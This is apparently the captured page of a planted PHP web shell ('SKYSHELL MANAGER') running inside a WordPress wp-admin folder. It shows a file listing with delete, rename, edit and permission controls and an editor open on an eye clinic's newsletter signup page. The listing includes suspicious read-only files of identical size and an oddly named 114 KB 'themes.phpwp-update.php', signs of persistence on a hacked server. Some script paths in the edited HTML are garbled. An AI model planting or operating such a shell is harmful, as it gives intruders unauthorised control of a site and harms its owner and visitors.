📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Pure Eye Vision</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <!-- Favicon --> <link rel="shortcut icon" href="img/fav.png" /> <!-- Google Web Fonts --> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Jost:wght@500;600;700&family=Open+Sans:wght@400;600&display=swap" rel="stylesheet"> <!-- Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> <!-- Libraries Stylesheet --> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/tempusdominus/css/tempusdominus-bootstrap-4.min.css" rel="stylesheet" /> <link href="lib/twentytwenty/twentytwenty.css" rel="stylesheet" /> <!-- Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Template Stylesheet --> <link href="css/style.css" rel="stylesheet"> </head> <body> <!-- Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center"> <div class="spinner-grow text-primary m-1" role="status"> <span class="sr-only">Loading...</span> </div> <div class="spinner-grow text-dark m-1" role="status"> <span class="sr-only">Loading...</span> </div> <div class="spinner-grow text-secondary m-1" role="status"> <span class="sr-only">Loading...</span> </div> </div> <!-- Spinner End --> <!-- Navbar Start --> <nav class="navbar navbar-expand-lg bg-white navbar-light shadow-sm px-5 py-3 py-lg-0"> <a href="index.php" class="navbar-brand p-0"> <img src="img/logo.png"> </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto py-0"> <a href="index.php" class="nav-item nav-link active">Home</a> <a href="about.php" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Treatments</a> <div class="dropdown-menu m-0"> <a href="treatment1.php" class="dropdown-item">Laser Eye Surgery</a> <a href="treatment2.php" class="dropdown-item">Glaucoma Treatment</a> <a href="treatment3.php" class="dropdown-item">Cataract Surgery</a> <a href="treatment4.php" class="dropdown-item">Macular Degeneration</a> <a href="treatment5.php" class="dropdown-item">Ocular Disease</a> </div> </div> <div class="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Vision Care</a> <div class="dropdown-menu m-0"> <a href="vision1.php" class="dropdown-item">Prescription Glasses</a> <a href="vision2.php" class="dropdown-item">Computer Glasses</a> <a href="vision3.php" class="dropdown-item">Protection Glasses</a> <a href="vision4.php" class="dropdown-item">Contact Lenses</a> <a href="vision5.php" class="dropdown-item">Low Vision Aids</a> </div> </div> <div class="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Test & Exams</a> <div class="dropdown-menu m-0"> <a href="care1.php" class="dropdown-item">Eye Exams</a> <a href="care2.php" class="dropdown-item">Vision Correction</a> <a href="care3.php" class="dropdown-item">Pediatric Eye Care</a> <a href="care4.php" class="dropdown-item">Retina Care</a> <a href="care5.php" class="dropdown-item">Diagnostic Testing</a> <a href="care6.php" class="dropdown-item">Diabetic Eye Exams</a> </div> </div> <a href="contact.php" class="nav-item nav-link">Contact</a> </div> </div> </nav> <!-- Navbar End --> <!-- Full Screen Search Start --> <div class="modal fade" id="searchModal" tabindex="-1"> <div class="modal-dialog modal-fullscreen"> <div class="modal-content" style="background: rgba(9, 30, 62, .7);"> <div class="modal-header border-0"> <button type="button" class="btn bg-white btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body d-flex align-items-center justify-content-center"> <div class="input-group" style="max-width: 600px;"> <input type="text" class="form-control bg-transparent border-primary p-3" placeholder="Type search keyword"> <button class="btn btn-primary px-4"><i class="bi bi-search"></i></button> </div> </div> </div> </div> </div> <!-- Full Screen Search End --> <!-- Hero Start --> <div class="container-fluid bg-primary py-5 hero-header mb-5"> <div class="row py-3"> <div class="col-12 text-center"> <h1 class="display-3 text-white animated zoomIn">Subscribe to Pure Eye Vision</h1> </div> </div> </div> <!-- Hero End --> <!-- Contact Start --> <div class="container-fluid py-5"> <div class="container"> <div class="row g-5"> <div class="col-xl-4 col-lg-6 wow slideInUp" data-wow-delay="0.1s"> </div> <div class="col-xl-4 col-lg-6 wow slideInUp" data-wow-delay="0.3s"> <p>Stay connected with Pure Eye Vision for the latest in eye care, vision health tips, and treatment updates.</p> <p>Get expert advice, early access to new treatments, and special offers delivered straight to your inbox.</p> <h3>What you’ll receive:</h3> <ul> <li>Eye health tips & preventive care guides</li> <li>Updates on advanced eye treatments</li> <li>Special offers & consultation alerts</li> <li>Latest news in vision care</li> </ul> <p>📩 Join our community today and take the first step toward better vision!</p> <p>Enter your email address below to subscribe.</p> <form method="post" id="sub"> <div class="row g-3"> <div class="col-12"> <input type="email" name="email" class="form-control border-0 bg-light px-4" placeholder="Your Email" style="height: 55px;"> </div> <div class="col-12"> <button class="btn btn-primary w-100 py-3" type="submit" name="submit">Subscribe</button> </div> </div> </form> <div id="loader" style="display:none;color: #252629;padding-top: 10px;">Processing...</div> <div id="responseMessage" style="color: #252629;padding-top: 10px;"></div> <script> document.getElementById("sub").addEventListener("submit", function(event) { event.preventDefault(); let form = this; let formData = new FormData(form); // Show loader document.getElementById("loader").style.display = "block"; document.getElementById("responseMessage").innerText = ""; fetch("sub.php", { method: "POST", body: formData }) .then(response => response.text()) .then(data => { // Hide loader document.getElementById("loader").style.display = "none"; // Display server message document.getElementById("responseMessage").innerText = data.trim(); // Clear email field form.reset(); }) .catch(error => { document.getElementById("loader").style.display = "none"; document.getElementById("responseMessage").innerText = "An error occurred."; }); }); </script> </div> <div class="col-xl-4 col-lg-12 wow slideInUp" data-wow-delay="0.6s"> </div> </div> </div> </div> <!-- Contact End --> <!-- Footer Start --> <div class="container-fluid bg-dark text-light py-5 wow fadeInUp" data-wow-delay="0.3s"> <div class="container pt-5"> <div class="row g-5 pt-4"> <div class="col-lg-3 col-md-6"> <h3 class="text-white mb-4">Eye Treatments</h3> <div class="d-flex flex-column justify-content-start"> <a class="text-light mb-2" href="treatment1.php"><i class="bi bi-arrow-right text-primary me-2"></i>Laser Eye Surgery</a> <a class="text-light mb-2" href="treatment2.php"><i class="bi bi-arrow-right text-primary me-2"></i>Glaucoma Treatment</a> <a class="text-light mb-2" href="treatment3.php"><i class="bi bi-arrow-right text-primary me-2"></i>Cataract Surgery</a> <a class="text-light mb-2" href="treatment4.php"><i class="bi bi-arrow-right text-primary me-2"></i>Macular Degeneration</a> <a class="text-light" href="treatment5.php"><i class="bi bi-arrow-right text-primary me-2"></i>Ocular Disease</a> </div> </div> <div class="col-lg-3 col-md-6"> <h3 class="text-white mb-4">Vision Care</h3> <div class="d-flex flex-column justify-content-start"> <a class="text-light mb-2" href="vision1.php"><i class="bi bi-arrow-right text-primary me-2"></i>Prescription Glasses</a> <a class="text-light mb-2" href="vision2.php"><i class="bi bi-arrow-right text-primary me-2"></i>Computer Glasses</a> <a class="text-light mb-2" href="vision3.php"><i class="bi bi-arrow-right text-primary me-2"></i>Protection Glasses</a> <a class="text-light mb-2" href="vision4.php"><i class="bi bi-arrow-right text-primary me-2"></i>Contact Lenses</a> <a class="text-light" href="vision5.php"><i class="bi bi-arrow-right text-primary me-2"></i>Low Vision Aids</a> </div> </div> <div class="col-lg-3 col-md-6"> <h3 class="text-white mb-4">Test & Exams</h3> <div class="d-flex flex-column justify-content-start"> <a class="text-light mb-2" href="care1.php"><i class="bi bi-arrow-right text-primary me-2"></i>Eye Exams</a> <a class="text-light mb-2" href="care2.php"><i class="bi bi-arrow-right text-primary me-2"></i>Vision Correction</a> <a class="text-light mb-2" href="care3.php"><i class="bi bi-arrow-right text-primary me-2"></i>Pediatric Eye Care</a> <a class="text-light mb-2" href="care4.php"><i class="bi bi-arrow-right text-primary me-2"></i>Retina Care</a> <a class="text-light" href="care5.php"><i class="bi bi-arrow-right text-primary me-2"></i>Diagnostic Testing</a> <a class="text-light" href="care6.php"><i class="bi bi-arrow-right text-primary me-2"></i>Diabetic Eye Exams</a> </div> </div> <div class="col-lg-3 col-md-6"> <h3 class="text-white mb-4">Get In Touch</h3> <p class="mb-2"><i class="bi bi-geo-alt text-primary me-2"></i>Suite 180,<br> 150 South Wacker Drive,<br> Chicago, IL 60606,<br> United States.</p> <p class="mb-2"><i class="bi bi-envelope-open text-primary me-2"></i>contact@pureeyevision.com</p> <p class="mb-0"><i class="bi bi-telephone text-primary me-2"></i>+1 312-555-7842</p> <h3 class="text-white mb-4" style="margin-top:20px;">Info</h3> <div class="d-flex flex-column justify-content-start"> <a class="text-light mb-2" href="contact.php"><i class="bi bi-arrow-right text-primary me-2"></i>Help</a><a class="text-light mb-2" href="subscribe.php"><i class="bi bi-arrow-right text-primary me-2"></i>Newsletter</a> <a class="text-light mb-2" href="privacypolicy.php"><i class="bi bi-arrow-right text-primary me-2"></i>Privacy Policy</a> <a class="text-light mb-2" href="termsandconditions.php"><i class="bi bi-arrow-right text-primary me-2"></i>Terms & Conditions</a> <a class="text-light mb-2" href="unsubscribe.php"><i class="bi bi-arrow-right text-primary me-2"></i>Unsubscribe</a> </div> </div> </div> </div> </div> <div class="container-fluid text-light py-4" style="background: #051225;"> <div class="container"> <div class="row g-0"> <div class="col-md-6 text-center text-md-start"> <p class="mb-md-0" style="font-size: 12px;">© <a class="text-white border-bottom" href="index.php">Pure Eye Vision</a>. All Rights Reserved.</p> </div> </div> </div> </div> <!-- Footer End --> <!-- Back to Top --> <a href="#" class="btn btn-lg btn-primary btn-lg-square rounded back-to-top"><i class="bi bi-arrow-up"></i></a> <!-- JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/distotstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script src="lib/waypoints/waypoints.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/tempusdominusment.min.js"></script> <script src="lib/tempusdominusment-timezone.min.js"></script> <script src="lib/tempusdominusmpusdominus-bootstrap-4.min.js"></script> <script src="lib/twentytwenty/jquery.event.move.js"></script> <script src="lib/twentytwenty/jquery.twentytwenty.js"></script> <!-- Template Javascript --> <script src="js/main.js"></script> </body> </html>
Save